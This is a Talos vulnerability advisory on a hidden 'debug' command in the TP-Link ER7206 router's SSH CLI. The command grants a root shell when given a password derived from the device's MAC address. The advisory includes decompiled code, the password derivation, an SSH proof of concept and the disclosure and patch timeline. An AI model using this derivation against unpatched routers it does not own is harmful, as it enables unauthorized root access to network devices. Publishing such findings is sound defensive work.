Talos Vulnerability Report

SUMMARY

A leftover debug code vulnerability exists in the cli_server debug functionality of Tp-Link ER7206 Omada Gigabit VPN Router 1.4.1 Build 20240117 Rel.57421. A specially crafted series of network requests can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Tp-Link ER7206 Omada Gigabit VPN Router 1.4.1 Build 20240117 Rel.57421

PRODUCT URLS

ER7206 Omada Gigabit VPN Router - https://www.tp-link.com/us/business-networking/vpn-router/er7206/

CVSSv3 SCORE

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-489 - Leftover Debug Code

DETAILS

The ER7206 Omada Gigabit VPN Router is a high-performance networking solution that supports gigabit connectivity, highly secure VPN and integration with Omada SDN for centralized cloud management and zero-touch provisioning.

The ER7206 router has a “Remote Assistance” functionality, when enabled it is possible to SSH into the router using the same admin credentials of the web portal.

After the SSH login the user has available a router cli shell:

>help

Commands available:
help                                                 Show available commands
exit                                                 Exit from current mode
enable                                               Turn on privileged commands
disable                                              Turn off privileged commands

The help command prints the available commands that the user can execute, that are limited in functionalities. There is an hidden command called debug, following the cli_server’s cli_debug_command function that is responsible to handle that command:

undefined8 cli_debug_command(undefined8 terminal_related)

{
    [...]
[1] ret = uac_com_get_dev_mac(&LAN_MAC);
    [...]
    error = 0;
[2] snprintf((char *)&mac_plus_admin,0x17,"%02X:%02X:%02X:%02X:%02X:%02Xadmin",
            (ulonglong)LAN_MAC._0_1_,(ulonglong)LAN_MAC._1_1_,(ulonglong)LAN_MAC._2_1_,
            (ulonglong)(byte)LAN_MAC,(ulonglong)local_44._0_1_,(ulonglong)(byte)local_44);
    mac_plus_admin_len = strlen((char *)&mac_plus_admin);
[3] md5_hexdigest(&mac_plus_admin,mac_plus_admin_len,mac_plus_admin_hex_digest,0x20);
    cli_print_no_enter(terminal_related,"Enter your password: ");
    [...]
    idx = 0;
    [...]
    while( true ) {
        [...]
        read_size = read(terminal,terminal_input_one_char,1);
        if (read_size < 0) break;
        input_char = (ulonglong)terminal_input_one_char[0];
        if (read_size == 0) goto check_password;
        if (((-1 < input_char) [...]) && input_char != 0)) {
            if (input_char == '\r') goto check_password;
            if (idx < 0x10) {
                terminal_input[idx] = terminal_input_one_char[0];
                idx = (longlong)((int)idx + 1);
            }
            else {
                error = -1;
            }
        }
    }
    [...]
check_password:
    if (error != -1) {
        if (error != 0) {
        return 0;
        }
[4]     is_eq = strncmp(mac_plus_admin_hex_digest,terminal_input,0x10);
        if (is_eq == 0) {
[5]         system_shell_wrap();
            return 0;
        }
    }
    [...]
}

This functionality asks for a password, if the password is correct the user is guaranteed a full linux shell.

At [1], it is fetched the LAN MAC address of the device, this is then used, at [2], to compose the <LAN_MAC>admin string. At [3] the MD5 of the composed string is calculated, then at [4] the first 16 bytes of the MD5 hex-digest is compared with the provided password, if the two are equal then the code at [5] is reached. At [5] the system_shell_wrap function is called, that will guarantee to the user a full linux shell.

Exploit Proof of Concept

The first thing to do is to enable the “Remote Assistance” in the web portal, after that it’s possible to SSH into the router:

ssh -oHostKeyAlgorithms=+ssh-rsa -oKexAlgorithms=diffie-hellman-group14-sha1 POC@192.168.0.1  
POC@192.168.0.1's password: 

>help

Commands available:
help                                                 Show available commands
exit                                                 Exit from current mode
enable                                               Turn on privileged commands
disable                                              Turn off privileged commands

The cli console offers a limited number of commands, if the hidden command debug is provided the cli would ask for a password:

>debug
Enter your password: 

BusyBox v1.22.1 (2024-01-16 18:32:23 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

_______                     ________        __
|       |.-----.-----.-----.|  |  |  |.----.|  |_
|   -   ||  _  |  -__|     ||  |  |  ||   _||   _|
|_______||   __|_____|__|__||________||__|  |____|
        |__| W I R E L E S S   F R E E D O M
-----------------------------------------------------
BARRIER BREAKER (Barrier Breaker, unknown)
-----------------------------------------------------
* 1/2 oz Galliano         Pour all ingredients into
* 4 oz cold Coffee        an irish coffee mug filled
* 1 1/2 oz Dark Rum       with crushed ice. Stir.
* 2 tsp. Creme de Cacao
-----------------------------------------------------
root@ER7206:/#

If the password is correct the user would obtain a full linux shell.

VENDOR RESPONSE

The vendor provided a fix at: https://www.tp-link.com/en/support/download/er7206/v1/#Firmware

TIMELINE

2024-02-21 - Vendor Disclosure
2024-06-20 - Vendor Patch Release
2024-06-25 - Public Release